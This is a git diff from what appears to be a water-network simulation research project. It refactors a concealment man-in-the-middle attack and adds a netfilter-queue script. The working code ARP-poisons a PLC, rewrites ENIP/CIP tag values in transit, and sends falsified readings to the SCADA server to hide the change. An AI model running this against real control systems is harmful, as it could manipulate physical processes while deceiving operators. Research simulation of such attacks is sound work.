Critical-Infrastructure-Systems-Lab
diff --git a/‎dhalsim/network_attacks/concealment_mitm.py‎
Lines changed: 48 additions & 148 deletions b/‎dhalsim/network_attacks/concealment_mitm.py‎
Lines changed: 48 additions & 148 deletions
diff --git a/‎dhalsim/network_attacks/concealment_netfilter_queue.py‎
Lines changed: 117 additions & 0 deletions b/‎dhalsim/network_attacks/concealment_netfilter_queue.py‎
Lines changed: 117 additions & 0 deletions
@@ -1,65 +1,38 @@
 import argparse
 import os
-import time
-import traceback
 from pathlib import Path
-import threading
 
-from dhalsim.network_attacks.enip_cip_parser import cip
-
-from netfilterqueue import NetfilterQueue
-from scapy.layers.inet import IP, TCP
-from scapy.packet import Raw
-
-from dhalsim.network_attacks.utilities import launch_arp_poison, restore_arp, \
-    translate_payload_to_float, translate_float_to_payload, get_mac, spoof_arp_cache
+from dhalsim.network_attacks.utilities import launch_arp_poison, restore_arp
 from dhalsim.network_attacks.synced_attack import SyncedAttack
 
-nfqueue = NetfilterQueue()
+import subprocess
+import sys
+import signal
 
 
-import _thread
-
 class Error(Exception):
     """Base class for exceptions in this module."""
 
 
 class DirectionError(Error):
     """Raised when the optional parameter direction does not have source or destination as value"""
 
-class ConcealmentAttack(SyncedAttack):
-    """
-    This is a Naive Man In The Middle attack. This  attack will modify
-    the data that is passed around in tcp packets on the network, in order to
-    change the values of tags before they reach the requesting PLC.
-
-    It does this by capturing the responses of the the target plc, and changing
-    some bytes in the TCP packet so that the value is a different value.
-
-    When preforming this attack, you can use either an offset, or an absolute value.
 
-    When using this type of attack, all the responses of the PLC are modified.
-    You cannot modify the values of individual tags.
+class ConcealmentMiTMAttack(SyncedAttack):
+    """
+    todo
 
     :param intermediate_yaml_path: The path to the intermediate YAML file
     :param yaml_index: The index of the attack in the intermediate YAML
     """
 
-    ARP_POISON_PERIOD = 15
-    """Period in seconds of arp poison"""
-
-
     def __init__(self, intermediate_yaml_path: Path, yaml_index: int):
         super().__init__(intermediate_yaml_path, yaml_index)
         os.system('sysctl net.ipv4.ip_forward=1')
-        self.queue = None
-        self.q = None
-        self.thread = None
-        self.run_thread = False
-        self.attacked_tag = self.intermediate_attack['tag']
 
-        # The session id is used to pair CIP requests (with the tag name), with their responses (with the tag value)
-        self.session_id = 0
+        # Process object to handle nfqueue
+        self.nfqueue_process = None
+
 
     def setup(self):
         """
@@ -74,113 +47,23 @@ def setup(self):
 
         Finally, it launches the thread that will examine all captured packets.
         """
-        #os.system(f'iptables -t mangle -A FORWARD -p tcp -d {self.target_plc_ip} -j NFQUEUE --queue-num 1')
-        os.system(f'iptables -t mangle -A FORWARD -p tcp -j NFQUEUE --queue-num 1')
-
-
-        os.system('iptables -A FORWARD -p icmp -j DROP')
-        os.system('iptables -A INPUT -p icmp -j DROP')
-        os.system('iptables -A OUTPUT -p icmp -j DROP')
+        self.modify_ip_tables(True)
 
-        self.logger.info(f"NFqueue Bound periodic ARP Poison between {self.target_plc_ip} and "
-                          f"{self.intermediate_attack['gateway_ip']}")
         # Launch the ARP poison by sending the required ARP network packets
-        self.launch_mitm(get_macs=True)
-        self.logger.info(f"Configured ARP Poison between {self.target_plc_ip} and "
-                         f"{self.intermediate_attack['gateway_ip']}")
-
-        self.logger.debug('Tag being attacked: ' + str(self.attacked_tag))
-
-        nfqueue.bind(0, self.capture)
-        nfqueue.run(block=False)
-
-        # Refresh ARP poison
-        #_thread.start_new_thread(self.refresh_poison, (self.ARP_POISON_PERIOD, self.ARP_POISON_PERIOD))
-
-    def refresh_poison(self, period, delay):
-        time.sleep(delay)
-        while self.run_thread:
-            self.launch_mitm(get_macs=False)
-            time.sleep(period)
-
-    def launch_mitm(self, get_macs=False):
+        launch_arp_poison(self.target_plc_ip, self.intermediate_attack['gateway_ip'])
         if self.intermediate_yaml['network_topology_type'] == "simple":
             for plc in self.intermediate_yaml['plcs']:
                 if plc['name'] != self.intermediate_plc['name']:
+                    launch_arp_poison(self.target_plc_ip, plc['local_ip'])
 
-                    if get_macs:
-                        self.mac_target_source = get_mac(self.target_plc_ip)
-                        self.mac_target_destination = get_mac(plc['local_ip'])
-
-                    spoof_arp_cache(self.target_plc_ip, self.mac_target_source, plc['local_ip'])
-                    spoof_arp_cache(plc['local_ip'], self.mac_target_destination, self.target_plc_ip)
-
-        else:
-            if get_macs:
-                self.mac_target_source = get_mac(self.target_plc_ip)
-                self.mac_target_destination = get_mac(self.intermediate_attack['gateway_ip'])
-
-            spoof_arp_cache(self.target_plc_ip, self.mac_target_source, self.intermediate_attack['gateway_ip'])
-            spoof_arp_cache(self.intermediate_attack['gateway_ip'], self.mac_target_destination, self.target_plc_ip)
-
-        self.logger.info(f"ARP Poison between {self.target_plc_ip} and "
+        self.logger.debug(f"Concealment MITM Attack ARP Poison between {self.target_plc_ip} and "
                           f"{self.intermediate_attack['gateway_ip']}")
 
-    def capture(self, packet):
-        """
-        This function is the function that will run in the thread started in the setup function.
+        queue_number = 1
+        nfqueue_path = Path(__file__).parent.absolute() / "concealment_netfilter_queue.py"
+        cmd = ["python3", str(nfqueue_path), str(self.intermediate_yaml_path), str(self.yaml_index), str(queue_number)]
 
-        For every packet that enters the netfilterqueue, it will check its length. If the length is
-        in between 100 and 116, we are dealing with a CIP packet. We then change the payload of that
-        packet and delete the original checksum.
-        """
-        while self.run_thread:
-            try:
-                p = IP(packet.payload)
-                #self.logger.debug('packet')
-                #self.logger.debug(p.show())
-                if 'ENIP_SendRRData' in p:
-                    # This type of packet carries the tag name
-                    #self.logger.debug('ENIP_SendRRData')
-                    #self.logger.debug(p.show())
-                    if 'CIP_ReqConnectionManager' in p:
-                        tag_name = p[Raw].load.decode(encoding='latin-1').split(':')[0][8:]
-                        self.logger.debug('ENIP TCP Session ID: ' + str(p['ENIP_TCP'].session))
-                        self.logger.debug('Received tag: ' + tag_name)
-
-                        if self.attacked_tag == tag_name:
-                            self.logger.debug('Modifying tag: ' + str(tag_name))
-                            self.session_id = p['ENIP_TCP'].session
-
-                    else:
-                        this_session = p['ENIP_TCP'].session
-                        if self.session_id == this_session:
-                            value = translate_payload_to_float(p[Raw].load)
-                            self.logger.debug('tag value is:' + str(value))
-                            self.logger.debug('Tag ' + self.attacked_tag + ' is going to be modified')
-
-                            if 'value' in self.intermediate_attack.keys():
-                                p[Raw].load = translate_float_to_payload(
-                                    self.intermediate_attack['value'], p[Raw].load)
-                            elif 'offset' in self.intermediate_attack.keys():
-                                self.logger.debug('Offsetting value')
-                                p[Raw].load = translate_float_to_payload(
-                                    translate_payload_to_float(p[Raw].load) + self.intermediate_attack[
-                                        'offset'], p[Raw].load)
-
-                            self.logger.debug\
-                                ('New payload tag value is: ' + str(translate_payload_to_float(p[Raw].load)))
-
-                            del p[TCP].chksum
-                            del p[IP].chksum
-
-                            packet.set_payload(bytes(p))
-                            self.logger.debug(f"Value of network packet for {p[IP].dst} overwritten.")
-
-                packet.accept()
-            except Exception as exc:
-                print("Exception in a MITM attack!:", exc)
-                print(traceback.format_exc())
+        self.nfqueue_process = subprocess.Popen(cmd, shell=False, stderr=sys.stderr, stdout=sys.stdout)
 
     def interrupt(self):
         """
@@ -203,26 +86,43 @@ def teardown(self):
                 if plc['name'] != self.intermediate_plc['name']:
                     restore_arp(self.target_plc_ip, plc['local_ip'])
 
-        self.logger.debug(f"Naive MITM Attack ARP Restore between {self.target_plc_ip} and "
+        self.logger.debug(f"MITM Attack ARP Restore between {self.target_plc_ip} and "
                           f"{self.intermediate_attack['gateway_ip']}")
 
-        os.system(
-            f'iptables -t mangle -D FORWARD -p tcp -j NFQUEUE --queue-num 1')
-
-        os.system('iptables -D FORWARD -p icmp -j DROP')
-        os.system('iptables -D INPUT -p icmp -j DROP')
-        os.system('iptables -D OUTPUT -p icmp -j DROP')
+        self.modify_ip_tables(False)
+        self.logger.debug(f"Restored ARP")
 
-        self.run_thread = False
-        time.sleep(0.5)
-        nfqueue.unbind()
-        #self.thread.join()
+        self.logger.debug("Stopping nfqueue subprocess...")
+        self.nfqueue_process.send_signal(signal.SIGINT)
+        self.nfqueue_process.wait()
+        if self.nfqueue_process.poll() is None:
+            self.nfqueue_process.terminate()
+        if self.nfqueue_process.poll() is None:
+            self.nfqueue_process.kill()
 
     def attack_step(self):
-        """This function just passes, as there is no required action in an attack step."""
+        """Polls the NetFilterQueue subprocess and sends a signal to stop it when teardown is called"""
         pass
 
 
+    @staticmethod
+    def modify_ip_tables(append=True):
+
+        if append:
+            os.system(f'iptables -t mangle -A PREROUTING -p tcp -j NFQUEUE --queue-num 1')
+
+            os.system('iptables -A FORWARD -p icmp -j DROP')
+            os.system('iptables -A INPUT -p icmp -j DROP')
+            os.system('iptables -A OUTPUT -p icmp -j DROP')
+        else:
+
+            os.system(f'iptables -t mangle -D INPUT -p tcp -j NFQUEUE --queue-num 1')
+            os.system(f'iptables -t mangle -D FORWARD -p tcp -j NFQUEUE --queue-num 1')
+
+            os.system('iptables -D FORWARD -p icmp -j DROP')
+            os.system('iptables -D INPUT -p icmp -j DROP')
+            os.system('iptables -D OUTPUT -p icmp -j DROP')
+
 def is_valid_file(parser_instance, arg):
     """Verifies whether the intermediate yaml path is valid."""
     if not os.path.exists(arg):
@@ -242,7 +142,7 @@ def is_valid_file(parser_instance, arg):
 
     args = parser.parse_args()
 
-    attack = ConcealmentAttack(
+    attack = ConcealmentMiTMAttack(
         intermediate_yaml_path=Path(args.intermediate_yaml),
         yaml_index=args.index)
     attack.main_loop()
@@ -0,0 +1,117 @@
+from dhalsim.network_attacks.mitm_netfilter_queue_subprocess import PacketQueue
+import argparse
+from pathlib import Path
+
+import os
+import sys
+
+from scapy.layers.inet import IP, TCP
+from scapy.packet import Raw
+
+from dhalsim.network_attacks.utilities import translate_payload_to_float, translate_float_to_payload
+
+
+class ConcealmentMiTMNetfilterQueue(PacketQueue):
+
+    def __init__(self,  intermediate_yaml_path: Path, yaml_index: int, queue_number: int ):
+        super().__init__(intermediate_yaml_path, yaml_index, queue_number)
+        self.attacked_tag = self.intermediate_attack['tag']
+        self.scada_session_ids = []
+        self.attack_session_ids = []
+
+    def capture(self, packet):
+        """
+        This function is the function that will run in the thread started in the setup function.
+
+        For every packet that enters the netfilterqueue, it will check its length. If the length is
+        in between 102, we are dealing with a CIP packet. We then change the payload of that
+        packet and delete the original checksum.
+        :param packet: The captured packet.
+        """
+        try:
+            p = IP(packet.get_payload())
+            if 'TCP' in p:
+                if len(p) == 116:
+                    this_session =  int.from_bytes(p[Raw].load[4:8], sys.byteorder)
+                    tag_name = p[Raw].load.decode(encoding='latin-1')[54:56]
+                    self.logger.debug('ENIP TCP Session ID: ' + str(this_session))
+                    self.logger.debug('Received tag is: ' + tag_name)
+                    self.logger.debug('Attack tag is: ' + self.attacked_tag)
+                    if self.attacked_tag == tag_name:
+                        # This is a packet being sent to SCADA server, conceal the manipulation
+                        self.logger.debug('Packet source: ' + p[IP].src )
+                        self.logger.debug('SCADA IP: ' + self.intermediate_yaml['scada']['public_ip'])
+                        if p[IP].src == self.intermediate_yaml['scada']['public_ip']:
+                            self.logger.debug('SCADA session: ' + str(this_session))
+                            self.scada_session_ids.append(this_session)
+                        else:
+                            self.logger.debug('PLC session: ' + str(this_session))
+                            self.attack_session_ids.append(this_session)
+
+                if len(p) == 102:
+                    this_session = int.from_bytes(p[Raw].load[4:8], sys.byteorder)
+                    if this_session in self.attack_session_ids:
+                        self.logger.debug('Modifying because session is: ' + str(this_session))
+                        value = translate_payload_to_float(p[Raw].load)
+                        self.logger.debug('tag value is:' + str(value))
+
+                        if 'value' in self.intermediate_attack.keys():
+                            p[Raw].load = translate_float_to_payload(
+                                self.intermediate_attack['value'], p[Raw].load)
+                        elif 'offset' in self.intermediate_attack.keys():
+                            p[Raw].load = translate_float_to_payload(
+                                translate_payload_to_float(p[Raw].load) + self.intermediate_attack[
+                                    'offset'], p[Raw].load)
+
+                        del p[IP].chksum
+                        del p[TCP].chksum
+
+                        packet.set_payload(bytes(p))
+                        self.logger.debug(f"Value of network packet for {p[IP].dst} overwritten.")
+
+
+                    elif this_session in self.scada_session_ids:
+                        self.logger.debug('Concealing to SCADA: ' + str(this_session))
+                        p[Raw].load = translate_float_to_payload(
+                            self.intermediate_attack['concealment_value'], p[Raw].load)
+
+                        del p[IP].chksum
+                        del p[TCP].chksum
+
+                        packet.set_payload(bytes(p))
+                        self.logger.debug(f"Value of network packet for {p[IP].dst} overwritten.")
+
+            packet.accept()
+        except Exception as exc:
+            print(exc)
+            if self.nfqueue:
+                self.nfqueue.unbind()
+            sys.exit(0)
+
+def is_valid_file(parser_instance, arg):
+    """Verifies whether the intermediate yaml path is valid."""
+    if not os.path.exists(arg):
+        parser_instance.error(arg + " does not exist")
+    else:
+        return arg
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Start everything for an attack')
+    parser.add_argument(dest="intermediate_yaml",
+                        help="intermediate yaml file", metavar="FILE",
+                        type=lambda x: is_valid_file(parser, x))
+    parser.add_argument(dest="index", help="Index of the network attack in intermediate yaml",
+                        type=int,
+                        metavar="N")
+    parser.add_argument(dest="number", help="Number of que queue configured in IP Tables",
+                        type=int,
+                        metavar="N")
+
+    args = parser.parse_args()
+
+    attack = ConcealmentMiTMNetfilterQueue(
+        intermediate_yaml_path=Path(args.intermediate_yaml),
+        yaml_index=args.index,
+        queue_number = args.number)
+    attack.main_loop()
+